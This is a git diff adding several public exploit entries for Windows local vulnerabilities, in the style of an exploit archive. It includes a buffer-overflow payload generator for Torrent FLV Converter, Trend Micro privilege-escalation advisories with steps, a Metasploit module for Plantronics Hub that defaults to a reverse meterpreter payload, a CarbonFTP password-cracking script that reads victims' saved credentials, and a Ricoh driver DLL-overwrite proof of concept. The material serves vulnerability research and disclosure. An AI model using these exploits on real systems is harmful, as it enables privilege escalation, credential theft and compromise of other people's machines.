+++ b/exploits/windows/local/47938.py
@@ -0,0 +1,31 @@
+# Exploit Title: Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)
+# Date: 2020-01-16
+# Exploit Author: antonio
+# Vendor Homepage: http://www.torrentrockyou.com/
+# Software Link: http://www.torrentrockyou.com/download/trflvconverter.exe
+# Version: 1.51 Build 117
+# Tested on: Windows 7 SP1 32-bit
+
+# Copy paste the contents of poc.txt into the
+# Registration Code input field.
+
+#!/usr/bin/python
+
+nseh_offset = 4500
+total = 5000
+
+# badchars
+# --------
+# 0x00, 0x0a, 0x0d, 0x80
+# 0xf0-x0ff, 0xe0-0x0ef, 0x70-0x7a
+# 0x61-0x6f, 0x9a, 0x9c, 0x9e
+
+poc = ""
+poc += "A"*(nseh_offset - 53)
+poc += "\x90"*53
+poc += "\x7d\xcb\x90\x90" # jump backwards to NOPs: jge via SF = OF
+poc += "\x7f\xb3\x45" # nseh pop pop ret: 3-byte partial overwrite
+
+file = open("poc_seh.txt","w")
+file.write(poc)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/47940.txt b/exploits/windows/local/47940.txt
new file mode 100644
index 000000000..5c14e6eaf
--- /dev/null
+++ b/exploits/windows/local/47940.txt
@@ -0,0 +1,90 @@
+# Exploit Title: Trend Micro Maximum Security 2019 - Arbitrary Code Execution
+# Date: 2020-1-16
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.trendmicro.com
+# Version: Platform Microsoft Windows, Premium Security 2019 (v15), Maximum Security 2019 (v15)
+# Internet Security 2019 (v15), Antivirus + Security 2019 (v15)
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt
+[+] ISR: ApparitionSec          
+
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product]
+Trend Micro Security 2019 (Consumer) Multiple Products
+
+
+Trend Micro Security provides comprehensive protection for your devices.
+This includes protection against ransomware, viruses, malware, spyware, and identity theft.
+
+
+[Vulnerability Type]
+Security Bypass Protected Service Tampering
+
+
+[CVE Reference]
+CVE-2019-19697
+
+
+[Security Issue]
+Trend Micro Maximum Security is vulnerable to arbitrary code execution as it allows for creation of registry key to target a process running as SYSTEM.
+This can allow a malware to gain elevated privileges to take over and shutdown services that require SYSTEM privileges like Trend Micros "Asmp"
+service "coreServiceShell.exe" which does not allow Administrators to tamper with them.
+
+This could allow an attacker or malware to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them to start.
+Note administrator privileges are required to exploit this vulnerability.
+
+
+[CVSS 3.0 Scores: 3.9]
+
+
+[Affected versions]
+Platform Microsoft Windows
+Premium Security 2019 (v15)
+Maximum Security 2019 (v15)
+Internet Security 2019 (v15)
+Antivirus + Security 2019 (v15)
+
+
+[References]
+https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx
+
+
+[Exploit/POC]
+1) Create a entry for the following registry key targeting "PtWatchdog.exe" and set the debugger string value to an arbitrary executable to gain SYSTEM privs.
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe
+
+2) Create a string named "debugger" under the reg key and give it the value of the executable you wish to run as SYSTEM.
+
+3) Restart the machine or wait until service is restart then you get SYSTEM and can now disable Trend Micro endpoint security coreServiceShell.exe service
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Low
+
+
+[Disclosure Timeline]
+Vendor Notification: October 8, 2019
+Vendor confirms issue: October 28, 2019
+Vendor release date: January 14, 2020
+January 16, 2020 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47943.txt b/exploits/windows/local/47943.txt
new file mode 100644
index 000000000..698b5f47d
--- /dev/null
+++ b/exploits/windows/local/47943.txt
@@ -0,0 +1,98 @@
+# Exploit Title: Trend Micro Maximum Security 2019 - Privilege Escalation
+# Date: 2020-1-16
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.trendmicro.com
+# Version: Platform Microsoft Windows, Premium Security 2019 (v15), Maximum Security 2019 (v15)
+# Internet Security 2019 (v15), Antivirus + Security 2019 (v15)
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec     
+ 
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product(s)]
+Trend Micro Security (Consumer) Multiple Products
+
+
+Trend Micro Security provides comprehensive protection for your devices.
+This includes protection against ransomware, viruses, malware, spyware, and identity theft.
+
+
+[Vulnerability Type]
+Persistent Arbitrary Code Execution
+
+
+[CVE Reference]
+CVE-2019-20357
+
+
+[CVSSv3 Scores: 6.7]
+
+
+[Security Issue]
+Trend Micro Security can potentially allow an attackers to use a malicious program to escalate privileges
+to SYSTEM integrity and attain persistence on a vulnerable system.
+
+
+[Product Affected Versions]
+Platform Microsoft Windows
+
+Premium Security 2019 (v15) and 2020 (v16)
+
+Maximum Security
+2019 (v15) and 2020 (v16)
+
+Internet Security
+2019 (v15) and 2020 (v16)
+	
+Antivirus + Security
+2019 (v15) and 2020 (v16)
+
+
+[References]
+https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx
+
+[Exploit/POC]
+Compile C test code "Program.c"
+
+void main(void){
+ puts("Done!");
+ system("pause");
+}
+
+1) Place under c:\ dir.
+2) Reboot the machine, the coreServiceShell.exe service loads and executes our binary with SYSTEM integrity.
+
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Medium
+
+
+
+[Disclosure Timeline]
+Vendor Notification: October 8, 2019
+vendor advisory: January 15, 2020
+January 16, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47944.rb b/exploits/windows/local/47944.rb
new file mode 100755
index 000000000..1c4d6e1aa
--- /dev/null
+++ b/exploits/windows/local/47944.rb
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Services
+  include Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Plantronics Hub SpokesUpdateService Privilege Escalation',
+      'Description'    => %q{
+        The Plantronics Hub client application for Windows makes use of an
+        automatic update service `SpokesUpdateService.exe` which automatically
+        executes a file specified in the `MajorUpgrade.config` configuration
+        file as SYSTEM. The configuration file is writable by all users by default.
+
+        This module has been tested successfully on Plantronics Hub version 3.13.2
+        on Windows 7 SP1 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Markus Krell', # Discovery and PoC
+        'bcoles'        # Metasploit
+      ],
+      'References'     =>
+        [
+          ['CVE', '2019-15742'],
+          ['EDB', '47845'],
+          ['URL', 'https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf']
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        => [['Automatic', {}]],
+      'DisclosureDate' => '2019-08-30',
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+        },
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
+  end
+
+  def service_exists?(service)
+    srv_info = service_info(service)
+
+    if srv_info.nil?
+      vprint_warning 'Unable to enumerate Windows services'
+      return false
+    end
+
+    if srv_info && srv_info[:display].empty?
+      return false
+    end
+
+    true
+  end
+
+  def check
+    service = 'PlantronicsUpdateService'
+
+    unless service_exists? service
+      return CheckCode::Safe("Service '#{service}' does not exist")
+    end
+
+    path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G"
+
+    unless exists? path
+      return CheckCode::Safe("Directory '#{path}' does not exist")
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_system?
+      fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
+    end
+
+    payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
+    payload_exe = generate_payload_exe
+    vprint_status "Writing payload to #{payload_path} ..."
+    write_file payload_path, payload_exe
+    register_file_for_cleanup payload_path
+
+    config_path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G\\MajorUpgrade.config"
+    vprint_status "Writing configuration file to #{config_path} ..."
+    write_file config_path, "#{session.sys.config.getenv('USERNAME')}|advertise|#{payload_path}"
+    register_file_for_cleanup config_path
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47950.txt b/exploits/windows/local/47950.txt
new file mode 100644
index 000000000..bb8dfa2f3
--- /dev/null
+++ b/exploits/windows/local/47950.txt
@@ -0,0 +1,401 @@
+# Exploit Title: NEOWISE CARBONFTP 1.4 - Weak Password Encryption
+# discovery Date: 2019-01-24
+# published : 2020-01-20
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: https://www.neowise.com
+# Software Link: https://www.neowise.com/freeware/
+# Version: 1.4
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+ 
+
+[Vendor]
+www.neowise.com
+
+
+[Product]
+CarbonFTP v1.4
+
+CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa.
+It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option
+to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be
+quickly re-used later.
+
+Download: https://www.neowise.com/freeware/
+Hash: 7afb242f13a9c119a17fe66c6f00a1c8
+
+
+[Vulnerability Type]
+Insecure Proprietary Password Encryption
+
+
+[CVE Reference]
+CVE-2020-6857
+
+
+[Affected Component]
+Password Encryption
+
+
+[Impact Escalation of Privileges]
+true
+
+
+[Impact Information Disclosure]
+true
+
+
+[Security Issue]
+CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key.
+The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex
+are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems
+to be the same for all executables across all systems. Finally, passwords are stored as decimal values.
+
+If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files.
+They can be found under "C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects".
+
+e.g.
+
+Password=STRING|"2086721956209392195620939"
+
+Observing some very short password examples we see interesting patterns:
+
+27264 27360 27360 27360 27360    =   a
+27520 27617 27617 27617 27617    =   b
+27266 27616 27360 27361 27616    =   aab
+27521 27616 27616 27616 27616    =   ba
+
+Password encryption/decryption is as follows.
+
+Encryption process example.
+484C as decimal is the value 18508
+97F hex to decimal is the value 2431 (encrypt key)
+18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL".
+
+To decrypt we just perform the reverse of the operation above.
+20939 - 2431 = 18508
+Next, convert the decimal value 18508 to hex and we get 484C.
+Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL".
+
+CarbonFTP passwords less than nine characters are padded using chars from the current password up until
+reaching a password length of nine bytes.
+
+The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length
+of nine bytes "XYXYXYXYX".
+
+Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. 
+
+Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"
+However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one
+shot without having several candidates to choose from with one of them being the correct password.
+
+Therefore, "LOOOOONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947"
+and because it is greater than nine bytes it is cracked without any candidate passwords returned.
+
+From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process.
+Using the same password "HELL" as example.
+
+BPX @47DA6F
+
+0047DA6F | 8D 45 F0                 | lea eax,dword ptr ss:[ebp-10]                   |
+0047DA72 | 50                       | push eax                                        |
+0047DA73 | B9 05 00 00 00           | mov ecx,5                                       |
+0047DA78 | 8B D3                    | mov edx,ebx                                     |
+0047DA7A | 8B 45 FC                 | mov eax,dword ptr ss:[ebp-4]                    | [ebp-4]:"2086721956209392195620939"
+0047DA7D | E8 F6 6B F8 FF           | call carbonftp.404678                           |
+0047DA82 | 83 C3 05                 | add ebx,5                                       |
+0047DA85 | 8B 45 F0                 | mov eax,dword ptr ss:[ebp-10]                   | [ebp-10]:"20867"
+0047DA88 | E8 AF AD F8 FF           | call carbonftp.40883C                           |
+0047DA8D | 2B 45 F8                 | sub eax,dword ptr ss:[ebp-8]                    | ;<======= BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
+0047DA90 | 66 89 06                 | mov word ptr ds:[esi],ax                        |
+0047DA93 | 83 C6 02                 | add esi,2                                       |
+0047DA96 | 8B 45 FC                 | mov eax,dword ptr ss:[ebp-4]                    | [ebp-4]:"2086721956209392195620939"
+0047DA99 | E8 7A 69 F8 FF           | call carbonftp.404418                           |
+0047DA9E | 3B D8                    | cmp ebx,eax                                     |
+0047DAA0 | 7E CD                    | jle carbonftp.47DA6F                            |
+
+
+Ok, simple explanation after SetBPX in 47DA88...
+
+At offset 0047DA8D,  97F is subtracted at [ebp-8] local variable which equals the decimal value 2431 (hex 97F)
+we also see EAX holds the value 55C4
+sub eax,dword ptr ss:[ebp-8]              
+therefore, 55C4 – 97F = 4C45            <======= ENCRYPT/DECRYPT KEY PROCESS.
+mov word ptr ds:[esi],ax
+add esi, 2  which is 4C45 + 2 = 4C47    <===== THEN
+
+Given a two letter combination like "HL":
+484C as decimal is 18508
+97F hex to decimal is 2431
+18508 + 2431 = 20939 = "HL"
+
+Done!
+
+
+[Exploit/POC]
+"CarbonFTPExploit.py"
+
+import time, string, sys, argparse, os
+from pkgutil import iter_modules
+
+#Sample test password 
+#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947 
+
+key="97F"  #2431 in decimal, the weak hardcoded encryption key within the vuln program.
+chunk_sz=5 #number of bytes we must decrypt the password by.
+
+#Password is stored here:
+#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
+
+#Neowise CarbonFTP v1.4
+#Insecure Proprietary Password Encryption
+#By John Page (aka hyp3rlinx)
+#Apparition Security
+#===================================================
+
+def carbonftp_conf(conf_file):
+    p=""
+    pipe=-1
+    passwd=""
+    lst_of_passwds=[]
+    try:
+        for p in conf_file: 
+            idx = p.find("Password=STRING|")
+            if idx != -1:
+                pipe = p.find("|")
+                if pipe != -1:
+                    passwd = p[pipe + 2: -2]
+                    print(" Password found: "+ passwd)
+                    lst_of_passwds.append(passwd) 
+    except Exception as e:
+        print(str(e))
+    return lst_of_passwds 
+    
+
+def reorder(lst):
+    k=1
+    j=0
+    for n in range(len(lst)):
+        k+=1
+        j+=1
+        try:
+            tmp = lst[n+k]
+            a = lst[n+j]
+            lst[n+j] = tmp
+            lst[n+k] = a
+        except Exception as e:
+            pass
+    return ''.join(lst)
+
+
+def dec2hex(dec):
+    tmp = str(hex(int(dec)))
+    return str(tmp[2:])
+
+
+def hex2ascii(h):
+    h=h.strip()
+    try:
+        hex_val = h.decode("hex")
+    except Exception as e:
+        print("[!] Not a valid hex string.")
+        exit()
+    filtered_str = filter(lambda s: s in string.printable, hex_val)
+    return filtered_str
+
+
+def chunk_passwd(passwd_lst):
+    lst = []
+    for passwd in passwd_lst:
+        while passwd:
+            lst.append(passwd[:chunk_sz])
+            passwd = passwd[chunk_sz:]
+    return lst
+
+
+cnt = 0
+passwd_str=""
+def deob(c):
+    
+    global cnt, passwd_str
+
+    tmp=""
+
+    try:
+        tmp = int(c) - int(key, 16)
+        tmp = dec2hex(tmp)
+    except Exception as e:
+        print("[!] Not a valid CarbonFTP encrypted password.")
+        exit()
+
+    b=""
+    a=""
+
+     #Seems we can delete the second char as its most always junk.
+    if cnt!=1:
+        a = tmp[:2]
+        cnt+=1
+    else:
+        b = tmp[:4]
+
+    passwd_str += hex2ascii(a + b)
+        
+    hex_passwd_lst = list(passwd_str)
+    return hex_passwd_lst
+
+
+def no_unique_chars(lst):
+    c=0
+    k=1
+    j=0
+    for i in range(len(lst)):
+        k+=1
+        j+=1
+        try:
+            a = lst[i]
+            b = lst[i+1]
+            if a != b:
+                c+=1
+            elif c==0:
+                print("[!] Possible one char password?: " +str(lst[0]))
+                return lst[0]
+        except Exception as e:
+            pass
+    return False
+
+
+def decryptor(result_lst):
+
+    global passwd_str, sz
+
+    final_carbon_passwd=""
+
+    print(" Decrypting ... \n")
+    for i in result_lst:
+        print("[-] "+i)
+        time.sleep(0.1)
+        lst = deob(i)
+
+    #Re-order chars to correct sequence using custom swap function (reorder).
+    reordered_pass = reorder(lst)
+    sz = len(reordered_pass)
+
+    #Flag possible single char password.
+    no_unique_chars(lst)
+    
+    print("[+] PASSWORD LENGTH: " + str(sz))
+    if sz == 9:
+        return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-4] + " | " +
+                reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
+    
+    #Shorter passwords less then nine chars will have several candidates
+    #as they get padded with repeating chars so we return those.
+        
+    passwd_str=""
+    return reordered_pass
+
+
+def display_cracked_passwd(sz, passwd):
+    if sz==9:
+        print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
+    else:
+        print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
+
+
+def parse_args():
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
+    parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
+    return parser.parse_args()
+
+
+def main(args):
+
+    global passwd_str, sz
+    victim=""
+
+    if args.user and args.encrypted_password:
+        print("[!] Supply a victims username -u or single encrypted password -p, not both.")
+        exit()
+
+    print("[+] Neowise CarbonFTP v1.4")
+    time.sleep(0.1)
+    print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
+    time.sleep(0.1)
+    print("[+] Discovered and cracked by hyp3rlinx")
+    time.sleep(0.1)
+    print("[+] ApparitionSec\n")
+    time.sleep(1)
+
+    #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
+    if args.user:
+        victim = args.user
+        os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
+        dir_lst = os.listdir(".")
+        for c in dir_lst:
+            f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
+            #Get encrypted password from conf file
+            passwd_enc = carbonftp_conf(f)
+            #Break up into 5 byte chunks as processed by the proprietary decryption routine.
+            result_lst = chunk_passwd(passwd_enc)
+            #Decrypt the 5 byte chunks and reassemble to the cleartext password.
+            cracked_passwd = decryptor(result_lst)
+            #Print cracked password or candidates.
+            display_cracked_passwd(sz, cracked_passwd)
+            time.sleep(0.3)
+            passwd_str=""
+            f.close()
+
+
+    #Crack a single password -p flag.
+    if args.encrypted_password:
+        passwd_to_crack_lst = []
+        passwd_to_crack_lst.append(args.encrypted_password)
+        result = chunk_passwd(passwd_to_crack_lst)
+        #Print cracked password or candidates.
+        cracked_passwd = decryptor(result)
+        display_cracked_passwd(sz, cracked_passwd)
+
+
+if __name__=="__main__":
+
+    parser = argparse.ArgumentParser()
+
+    if len(sys.argv)==1:
+        parser.print_help(sys.stderr)
+        exit()
+
+    main(parse_args())
+
+[POC Video URL]
+https://www.youtube.com/watch?v=q9LMvAl6LfE
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: Website contact form not working, several attempts : January 12, 2020
+CVE Assigned by mitre : January 13, 2020
+January 20, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47962.c b/exploits/windows/local/47962.c
new file mode 100644
index 000000000..866770cb8
--- /dev/null
+++ b/exploits/windows/local/47962.c
@@ -0,0 +1,195 @@
+/*
+
+This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites
+a DLL file before the library is loaded (CVE-2019-19363).
+
+Written by Pentagrid AG, 2019.
+
+Cf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/
+
+Credits: Alexander Pudwill
+
+This proof of concept code is based on the ReadDirectoryChangesW API call to
+get notified about changes on files and directories and reuses parts from the example from
+https://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html
+
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <conio.h>
+#include <windows.h>
+
+#define MAX_BUFFER  4096
+
+int change_counter = 0;
+const WCHAR * const BaseDirName = L"C:\\ProgramData";
+const WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName;
+DWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE |
+        FILE_NOTIFY_CHANGE_SIZE |
+        FILE_NOTIFY_CHANGE_LAST_ACCESS |
+        FILE_NOTIFY_CHANGE_CREATION;
+
+typedef struct _DIRECTORY_INFO {
+        HANDLE      hDir;
+        TCHAR       lpszDirName[MAX_PATH];
+        CHAR        lpBuffer[MAX_BUFFER];
+        DWORD       dwBufLength;
+        OVERLAPPED  Overlapped;
+} DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO;
+
+DIRECTORY_INFO  DirInfo;
+
+void WINAPI HandleDirectoryChange(DWORD dwCompletionPort) {
+        DWORD numBytes, cbOffset;
+        LPDIRECTORY_INFO di;
+        LPOVERLAPPED lpOverlapped;
+        PFILE_NOTIFY_INFORMATION fni;
+        WCHAR FileName[MAX_PATH];
+
+        do {
+
+                GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE);
+
+                if (di) {
+                        fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer;
+
+                        do {
+                                cbOffset = fni->NextEntryOffset;
+
+                                // get filename
+                                size_t num_elem = fni->FileNameLength / sizeof(WCHAR);
+                                if (num_elem >= sizeof(FileName) / sizeof(WCHAR)) num_elem = 0;
+
+                                wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), fni->FileName, num_elem);
+                                FileName[num_elem] = '\0';
+                                wprintf(L"+ Event for %s [%d]\n", FileName, change_counter);
+
+                                if (fni->Action == FILE_ACTION_MODIFIED) {
+
+                                        if (!wcscmp(FileName, TargetDLLRelFilePath)) {
+
+                                                if (change_counter > 0)
+                                                        change_counter--;
+                                                if (change_counter == 0) {
+                                                        change_counter--;
+
+                                                        if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE))
+                                                                wprintf(L"+ File %s copied to %s.\n", MaliciousLibraryFile, TargetDllFullFilePath);
+
+                                                        else {
+                                                                wchar_t buf[256];
+
+                                                                FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
+                                                                        NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
+                                                                        buf, (sizeof(buf) / sizeof(wchar_t)), NULL);
+
+                                                                wprintf(L"+ Failed to copy file %s to %s: %s\n", MaliciousLibraryFile, TargetDllFullFilePath, buf);
+                                                        }
+
+                                                        exit(1);
+                                                } // end of trigger part
+                                        }
+                                } // eo action mod
+                                fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + cbOffset);
+
+                        } while (cbOffset);
+
+                        // Reissue the watch command
+                        ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL);
+                }
+        } while (di);
+}
+
+void WINAPI InstallPrinter() {
+        WCHAR cmd_buf[1000];
+        swprintf(cmd_buf, sizeof(cmd_buf), L"/c rundll32 printui.dll, PrintUIEntry /if /b \"Printer\" /r lpt1: /m \"%s\"", PrinterName);
+        wprintf(L"+ Adding printer: %s\n", cmd_buf);
+
+        unsigned long ret = (unsigned long) ShellExecuteW(0, L"open", L"cmd", cmd_buf, NULL, SW_HIDE);
+        if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value.
+                wprintf(L"+ Failed launching command. Return value is %d\n", ret);
+}
+
+void WINAPI WatchDirectories(HANDLE hCompPort) {
+        DWORD   tid;
+        HANDLE  hThread;
+
+        ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL);
+
+        // Create a thread to sit on the directory changes
+        hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid);
+
+        // Just loop and wait for the user to quit
+        InstallPrinter();
+        while (_getch() != 'q');
+
+        // The user has quit - clean up
+        PostQueuedCompletionStatus(hCompPort, 0, 0, NULL);
+
+        // Wait for the Directory thread to finish before exiting
+        WaitForSingleObject(hThread, INFINITE);
+        CloseHandle(hThread);
+}
+
+
+int wmain(int argc, WCHAR *argv[]) {
+        HANDLE  hCompPort = NULL;                 // Handle To a Completion Port
+
+        if (argc == 6) {
+                PrinterName = argv[1];
+                TargetDllFullFilePath = argv[2];
+                TargetDLLRelFilePath = argv[3];
+                MaliciousLibraryFile = argv[4];
+                change_counter = _wtoi(argv[5]);
+        }
+        else {
+                wprintf(L"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\n", argv[0]);
+                return 0;
+        }
+        wprintf(L"+ Monitoring directory %s\n", BaseDirName);
+
+        // Get a handle to the directory
+        DirInfo.hDir = CreateFile(BaseDirName,
+                FILE_LIST_DIRECTORY,
+                FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+                NULL,
+                OPEN_EXISTING,
+                FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED,
+                NULL);
+
+        if (DirInfo.hDir == INVALID_HANDLE_VALUE) {
+                wprintf(L"Unable to open directory %s. GLE=%ld. Terminating...\n",
+                        BaseDirName, GetLastError());
+                return 0;
+        }
+
+        lstrcpy(DirInfo.lpszDirName, BaseDirName);
+
+        if (HANDLE hFile = CreateFile(TargetDllFullFilePath,
+                GENERIC_WRITE,
+                FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+                NULL,
+                CREATE_ALWAYS,
+                FILE_ATTRIBUTE_NORMAL,
+                NULL)) {
+                wprintf(L"+ File %s created\n", TargetDllFullFilePath);
+                CloseHandle(hFile);
+        }
+        else
+                wprintf(L"+ File %s could not be created\n", TargetDllFullFilePath);
+
+
+        if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) {
+                wprintf(L"+ CreateIoCompletionPort() failed.\n");
+                return 0;
+        }
+
+        wprintf(L"+ Press <q> to exit\n");
+
+        // Start watching
+        WatchDirectories(hCompPort);
+
+        CloseHandle(DirInfo.hDir);
+        CloseHandle(hCompPort);
+        return 1;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/47965.py b/exploits/windows/local/47965.py
new file mode 100755
index 000000000..230b39341
--- /dev/null
+++ b/exploits/windows/local/47965.py
